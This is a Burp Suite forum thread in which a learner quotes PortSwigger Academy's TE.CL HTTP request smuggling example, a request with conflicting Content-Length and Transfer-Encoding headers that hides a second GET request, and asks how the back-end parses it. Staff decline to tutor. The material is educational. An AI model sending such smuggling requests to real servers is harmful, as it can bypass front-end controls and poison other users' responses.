Research Academy
My account Customers About Blog Careers Legal Contact Resellers

Burp Suite User Forum

Create new post

HTTP Request Smuggling

mlhblbl | Last updated: Feb 11, 2022 03:01PM UTC

Located at https://portswigger.net/web-security/request-smuggling/finding uri The request for "Confirming TE.CL vulnerabilities using differential responses" is given as "POST /search HTTP/1.1 Host: vulnerable-website.com Content-Type: application/x-www-form-urlencoded Content-Length: 4 Transfer-Encoding: chunked 7c GET /404 HTTP/1.1 Host: vulnerable-website.com Content-Type: application/x-www-form-urlencoded Content-Length: 144 x= 0". On the other hand, the request returned by the server was given as "GET /404 HTTP/1.1 Host: vulnerable-website.com Content-Type: application/x-www-form-urlencoded Content-Length: 146 x= 0 POST /search HTTP/1.1 Host: vulnerable-website.com Content-Type: application/x-www-form-urlencoded Content-Length: 11 q=smuggling". But if the front-end uses TE, shouldn't the part that needs to be sent to the back-end in the first request sent up to 0? So I think the request returned by the server should be like this: "GET /404 HTTP/1.1 Host: vulnerable-website.com Content-Type: application/x-www-form-urlencoded Content-Length: 146 x=POST /search HTTP/1.1 Host: vulnerable-website.com Content-Type: application/x-www-form-urlencoded Content-Length: 11 q=smuggling". Can you explain why it's not going that way?

Uthman, PortSwigger Agent | Last updated: Feb 14, 2022 01:52PM UTC

Thanks for your query. Unfortunately, we are unable to provide personal support or tutoring to Academy users, as we prefer to improve the experience for our entire userbase by focusing on expanding and refining our public content.

Your post will remain up for a member of the community to reply. :)

You must be an existing, logged-in customer to reply to a thread. Please email us for additional support.